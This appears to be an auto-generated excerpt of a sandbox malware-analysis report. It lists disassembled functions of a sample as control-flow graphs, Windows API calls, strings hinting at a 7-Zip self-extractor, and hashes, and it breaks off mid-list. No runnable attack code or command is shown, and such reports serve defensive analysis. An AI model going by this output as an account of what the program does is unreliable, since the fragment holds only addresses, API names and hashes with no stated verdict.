                                                                  control_flow_graph 781 40b163-40b183 call 40f0b6 784 40b2f6-40b2f9 781->784 785 40b189-40b190 call 40ac2d 781->785 788 40b192-40b194 785->788 789 40b199-40b1d6 call 40adc3 memcpy 785->789 788->784 792 40b1d9-40b1dd 789->792 793 40b202-40b221 792->793 794 40b1df-40b1f2 792->794 800 40b2a2 793->800 801 40b223-40b22b 793->801 795 40b297-40b2a0 ??3@YAXPAX@Z 794->795 796 40b1f8 794->796 799 40b2f4-40b2f5 795->799 796->793 797 40b1fa-40b1fc 796->797 797->793 797->795 799->784 802 40b2a4-40b2a5 800->802 803 40b2a7-40b2aa 801->803 804 40b22d-40b231 801->804 805 40b2ed-40b2f2 ??3@YAXPAX@Z 802->805 803->802 804->793 806 40b233-40b243 804->806 805->799 807 40b245 806->807 808 40b27a-40b292 memmove 806->808 809 40b254-40b258 807->809 808->792 810 40b25a 809->810 811 40b24c-40b24e 809->811 812 40b25c 810->812 811->812 813 40b250-40b251 811->813 812->808 814 40b25e-40b267 call 40ac2d 812->814 813->809 817 40b269-40b278 814->817 818 40b2ac-40b2e5 memcpy call 40dcfb 814->818 817->808 819 40b247-40b24a 817->819 820 40b2e8-40b2eb 818->820 819->809 820->805
                                                                  APIs
                                                                  • memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
                                                                  • memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@memcpymemmove
                                                                  • String ID:
                                                                  • API String ID: 3549172513-3916222277
                                                                  • Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                  • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                                                                  • Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                  • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D
                                                                  Function 00403354 Relevance: 10.6, APIs: 7, Instructions: 145stringtimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 822 403354-40337a lstrlenW call 4024fc 825 403385-403391 822->825 826 40337c-403380 call 40112b 822->826 828 403393-403397 825->828 829 403399-40339f 825->829 826->825 828->829 830 4033a2-4033a4 828->830 829->830 831 4033c8-4033d1 call 401986 830->831 834 4033d3-4033e6 GetSystemTimeAsFileTime GetFileAttributesW 831->834 835 4033b7-4033b9 831->835 838 4033e8-4033f6 call 40301a 834->838 839 4033ff-403408 call 401986 834->839 836 4033a6-4033ae 835->836 837 4033bb-4033bd 835->837 836->837 844 4033b0-4033b4 836->844 840 4033c3 837->840 841 403477-40347d 837->841 838->839 851 4033f8-4033fa 838->851 852 403419-40341b 839->852 853 40340a-403417 call 407776 839->853 840->831 847 4034a7-4034ba call 407776 ??3@YAXPAX@Z 841->847 848 40347f-40348a 841->848 844->837 849 4033b6 844->849 864 4034bc-4034c0 847->864 848->847 854 40348c-403490 848->854 849->835 858 40349c-4034a5 ??3@YAXPAX@Z 851->858 855 40346b-403475 ??3@YAXPAX@Z 852->855 856 40341d-40343c memcpy 852->856 853->851 854->847 860 403492-403497 854->860 855->864 862 403451-403455 856->862 863 40343e 856->863 858->864 860->847 861 403499-40349b 860->861 861->858 867 403440-403448 862->867 868 403457-403464 call 401986 862->868 866 403450 863->866 866->862 867->868 869 40344a-40344e 867->869 868->853 872 403466-403469 868->872 869->866 869->868 872->855 872->856
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                    • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                    • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                  • memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                  • String ID:
                                                                  • API String ID: 846840743-0
                                                                  • Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                  • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                                                                  • Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                  • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD
                                                                  Function 00404405 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                    • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                    • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                    • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                    • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                    • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                    • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                    • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                    • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                    • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                    • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                    • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                    • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                                                                    • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                                                  • wsprintfW.USER32 ref: 004044A7
                                                                    • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                  • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                  • String ID: 7zSfxFolder%02d$IA
                                                                  • API String ID: 3387708999-1317665167
                                                                  • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                  • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                                                  • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                  • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58
                                                                  Function 00408EA4 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 464COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 913 408ea4-408ebf call 40aef3 916 408ec1-408ecb 913->916 917 408ece-408f07 call 4065ea call 408726 913->917 922 408fd5-408ffb call 408d21 call 408b7c 917->922 923 408f0d-408f17 ??2@YAPAXI@Z 917->923 935 408ffd-409013 call 408858 922->935 936 40901e 922->936 925 408f26 923->925 926 408f19-408f24 923->926 927 408f28-408f61 call 4010e2 ??2@YAPAXI@Z 925->927 926->927 933 408f73 927->933 934 408f63-408f71 927->934 937 408f75-408fae call 4010e2 call 408726 call 40cdb8 933->937 934->937 944 409199-4091b0 935->944 945 409019-40901c 935->945 939 409020-409035 call 40e8da call 40874d 936->939 965 408fb0-408fb2 937->965 966 408fb6-408fbb 937->966 954 409037-409044 ??2@YAPAXI@Z 939->954 955 40906d-40907d 939->955 952 4091b6 944->952 953 40934c-409367 call 4087ea 944->953 945->939 957 4091b9-4091e9 952->957 975 409372-409375 953->975 976 409369-40936f 953->976 958 409046-40904d call 408c96 954->958 959 40904f 954->959 970 4090ad-4090b3 955->970 971 40907f 955->971 978 409219-40925f call 40e811 * 2 957->978 979 4091eb-4091f1 957->979 963 409051-409061 call 408726 958->963 959->963 987 409063-409066 963->987 988 409068 963->988 965->966 968 408fc3-408fcf 966->968 969 408fbd-408fbf 966->969 968->922 968->923 969->968 981 409187-409196 call 408e83 970->981 982 4090b9-4090e6 call 40d94b 970->982 977 409081-4090a7 call 40e959 call 408835 call 408931 call 408963 971->977 975->977 983 40937b-4093a2 call 40e811 975->983 976->975 977->970 1016 409261-409264 978->1016 1017 4092c9 978->1017 985 4091f7-409209 979->985 986 4092b9-4092bb 979->986 981->944 1005 409283-409288 982->1005 1006 4090ec-4090f3 982->1006 999 4093a4-4093b8 call 408761 983->999 1000 4093ba-4093d6 983->1000 1013 409293-409295 985->1013 1014 40920f-409211 985->1014 1001 4092bf-4092c4 986->1001 994 40906a 987->994 988->994 994->955 999->1000 1080 4093d7 call 40ce70 1000->1080 1081 4093d7 call 40f160 1000->1081 1001->977 1011 409290 1005->1011 1012 40928a-40928c 1005->1012 1007 409121-409124 1006->1007 1008 4090f5-4090f9 1006->1008 1022 4092b2-4092b7 1007->1022 1023 40912a-409138 call 408726 1007->1023 1008->1007 1018 4090fb-4090fe 1008->1018 1011->1013 1012->1011 1025 409297-409299 1013->1025 1026 40929d-4092a0 1013->1026 1014->978 1024 409213-409215 1014->1024 1027 409267-40927f call 408761 1016->1027 1030 4092cc-4092d2 1017->1030 1028 409104-409112 call 408726 1018->1028 1029 4092a5-4092aa 1018->1029 1020 4093da-4093e4 call 40e959 1020->977 1022->986 1022->1001 1046 409145-409156 call 40cdb8 1023->1046 1047 40913a-409140 call 40d6f0 1023->1047 1024->978 1025->1026 1026->977 1049 409281 1027->1049 1028->1046 1050 409114-40911f call 40d6cb 1028->1050 1029->1001 1041 4092ac-4092ae 1029->1041 1036 4092d4-4092e0 call 408a55 1030->1036 1037 40931d-409346 call 40e959 * 2 1030->1037 1057 4092e2-4092ec 1036->1057 1058 4092ee-4092fa call 408aa0 1036->1058 1037->953 1037->957 1041->1022 1059 409158-40915a 1046->1059 1060 40915e-409163 1046->1060 1047->1046 1049->1030 1050->1046 1063 409303-40931b call 408761 1057->1063 1074 409300 1058->1074 1075 4093e9-4093fe call 40e959 * 2 1058->1075 1059->1060 1065 409165-409167 1060->1065 1066 40916b-409170 1060->1066 1063->1036 1063->1037 1065->1066 1071 409172-409174 1066->1071 1072 409178-409181 1066->1072 1071->1072 1072->981 1072->982 1074->1063 1075->977 1080->1020 1081->1020
                                                                  APIs
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@
                                                                  • String ID: IA$IA
                                                                  • API String ID: 1033339047-1400641299
                                                                  • Opcode ID: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                                  • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                                                  • Opcode Fuzzy Hash: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                                  • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44
                                                                  Function 00410CD0 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 23COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1095 410cd0-410d1a call 410b9a free 1098 410d22-410d23 1095->1098 1099 410d1c-410d1e 1095->1099 1099->1098
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID: $KA$4KA$HKA$\KA
                                                                  • API String ID: 1294909896-3316857779
                                                                  • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                  • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                                                  • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                  • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C
                                                                  Function 004096C7 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 388COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1100 4096c7-40970f _EH_prolog call 4010e2 1103 409711-409714 1100->1103 1104 409717-40971a 1100->1104 1103->1104 1105 409730-409755 1104->1105 1106 40971c-409721 1104->1106 1109 409757-40975d 1105->1109 1107 409723-409725 1106->1107 1108 409729-40972b 1106->1108 1107->1108 1110 409b93-409ba4 1108->1110 1111 409763-409767 1109->1111 1112 409827-40983a call 40118a 1109->1112 1113 409769-40976c 1111->1113 1114 40976f-40977e 1111->1114 1120 409851-409876 call 408e4e ??2@YAPAXI@Z 1112->1120 1121 40983c-409846 call 409425 1112->1121 1113->1114 1116 409780-409796 call 4094e0 call 40969d call 40e959 1114->1116 1117 4097a3-4097a8 1114->1117 1137 40979b-4097a1 1116->1137 1118 4097b6-4097f0 call 4094e0 call 40969d call 40e959 call 4095b7 1117->1118 1119 4097aa-4097b4 1117->1119 1124 4097f3-409809 1118->1124 1119->1118 1119->1124 1133 409881-40989a call 4010e2 call 40eb24 1120->1133 1134 409878-40987f call 40ebf7 1120->1134 1144 40984a-40984c 1121->1144 1129 40980c-409814 1124->1129 1136 409816-409825 call 409403 1129->1136 1129->1137 1153 40989d-4098c0 call 40eb19 1133->1153 1134->1133 1136->1129 1137->1109 1144->1110 1157 4098c2-4098c7 1153->1157 1158 4098f6-4098f9 1153->1158 1161 4098c9-4098cb 1157->1161 1162 4098cf-4098e7 call 409530 call 409425 1157->1162 1159 409925-409949 ??2@YAPAXI@Z 1158->1159 1160 4098fb-409900 1158->1160 1163 409954 1159->1163 1164 40994b-409952 call 409c13 1159->1164 1165 409902-409904 1160->1165 1166 409908-40991e call 409530 call 409425 1160->1166 1161->1162 1179 4098e9-4098eb 1162->1179 1180 4098ef-4098f1 1162->1180 1170 409956-40996d call 4010e2 1163->1170 1164->1170 1165->1166 1166->1159 1181 40997b-4099a0 call 409fb4 1170->1181 1182 40996f-409978 1170->1182 1179->1180 1180->1110 1186 4099a2-4099a7 1181->1186 1187 4099e3-4099e6 1181->1187 1182->1181 1190 4099a9-4099ab 1186->1190 1191 4099af-4099b4 1186->1191 1188 4099ec-409a49 call 409603 call 4094b1 call 408ea4 1187->1188 1189 409b4e-409b53 1187->1189 1205 409a4e-409a53 1188->1205 1194 409b55-409b56 1189->1194 1195 409b5b-409b7f 1189->1195 1190->1191 1192 4099b6-4099b8 1191->1192 1193 4099bc-4099d4 call 409530 call 409425 1191->1193 1192->1193 1206 4099d6-4099d8 1193->1206 1207 4099dc-4099de 1193->1207 1194->1195 1195->1153 1208 409ab5-409abb 1205->1208 1209 409a55 1205->1209 1206->1207 1207->1110 1211 409ac1-409ac3 1208->1211 1212 409abd-409abf 1208->1212 1210 409a57 1209->1210 1213 409a5a-409a63 call 409f49 1210->1213 1214 409a65-409a67 1211->1214 1215 409ac5-409ad1 1211->1215 1212->1210 1213->1214 1225 409aa2-409aa4 1213->1225 1217 409a69-409a6a 1214->1217 1218 409a6f-409a71 1214->1218 1219 409ad3-409ad5 1215->1219 1220 409ad7-409add 1215->1220 1217->1218 1222 409a73-409a75 1218->1222 1223 409a79-409a91 call 409530 call 409425 1218->1223 1219->1213 1220->1195 1224 409adf-409ae5 1220->1224 1222->1223 1223->1144 1233 409a97-409a9d 1223->1233 1224->1195 1228 409aa6-409aa8 1225->1228 1229 409aac-409ab0 1225->1229 1228->1229 1229->1195 1233->1144
                                                                  APIs
                                                                  • _EH_prolog.MSVCRT ref: 004096D0
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                                                                    • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$H_prolog
                                                                  • String ID: HIA
                                                                  • API String ID: 3431946709-2712174624
                                                                  • Opcode ID: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                                  • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                                                  • Opcode Fuzzy Hash: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                                  • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54
                                                                  Function 00402844 Relevance: 6.4, APIs: 5, Instructions: 118stringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1236 402844-40288e call 411c20 call 40dcfb lstrlenA * 2 1240 402893-4028af call 40dcc7 1236->1240 1242 4028b5-4028ba 1240->1242 1243 40297f 1240->1243 1242->1243 1244 4028c0-4028ca 1242->1244 1245 402981-402985 1243->1245 1246 4028cd-4028d2 1244->1246 1247 402911-402916 1246->1247 1248 4028d4-4028d9 1246->1248 1249 40293b-40295f memmove 1247->1249 1251 402918-40292b memcmp 1247->1251 1248->1249 1250 4028db-4028ee memcmp 1248->1250 1256 402961-402968 1249->1256 1257 40296e-402979 1249->1257 1252 4028f4-4028fe 1250->1252 1253 40297b-40297d 1250->1253 1254 40290b-40290f 1251->1254 1255 40292d-402939 1251->1255 1252->1243 1258 402900-402906 call 402640 1252->1258 1253->1245 1254->1246 1255->1246 1256->1257 1259 402890 1256->1259 1257->1245 1258->1254 1259->1240
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                  • memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                  • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                  • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlenmemcmp$memmove
                                                                  • String ID:
                                                                  • API String ID: 3251180759-0
                                                                  • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                  • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                                                  • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                  • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55
                                                                  Function 0040150B Relevance: 6.1, APIs: 4, Instructions: 100synchronizationthreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1263 40150b-401561 call 408726 call 401329 call 401429 CreateThread 1270 401563 call 40786b 1263->1270 1271 401568-401583 WaitForSingleObject 1263->1271 1270->1271 1273 401585-401588 1271->1273 1274 4015b7-4015bd 1271->1274 1277 40158a-40158d 1273->1277 1278 4015ab 1273->1278 1275 40161b 1274->1275 1276 4015bf-4015d4 GetExitCodeThread 1274->1276 1280 401620-401623 1275->1280 1281 4015d6-4015d8 1276->1281 1282 4015de-4015e9 1276->1282 1283 4015a7-4015a9 1277->1283 1284 40158f-401592 1277->1284 1279 4015ad-4015b5 call 407776 1278->1279 1279->1275 1281->1282 1286 4015da-4015dc 1281->1286 1287 4015f1-4015fa 1282->1287 1288 4015eb-4015ec 1282->1288 1283->1279 1289 4015a3-4015a5 1284->1289 1290 401594-401597 1284->1290 1286->1280 1293 401605-401611 SetLastError 1287->1293 1294 4015fc-401603 1287->1294 1292 4015ee-4015ef 1288->1292 1289->1279 1295 401599-40159c 1290->1295 1296 40159e-4015a1 1290->1296 1297 401613-401618 call 407776 1292->1297 1293->1297 1294->1275 1294->1293 1295->1275 1295->1296 1296->1292 1297->1275
                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                                                                  • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                                                    • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                    • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                    • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                    • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                    • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                    • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                    • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                    • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                    • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                    • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                    • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
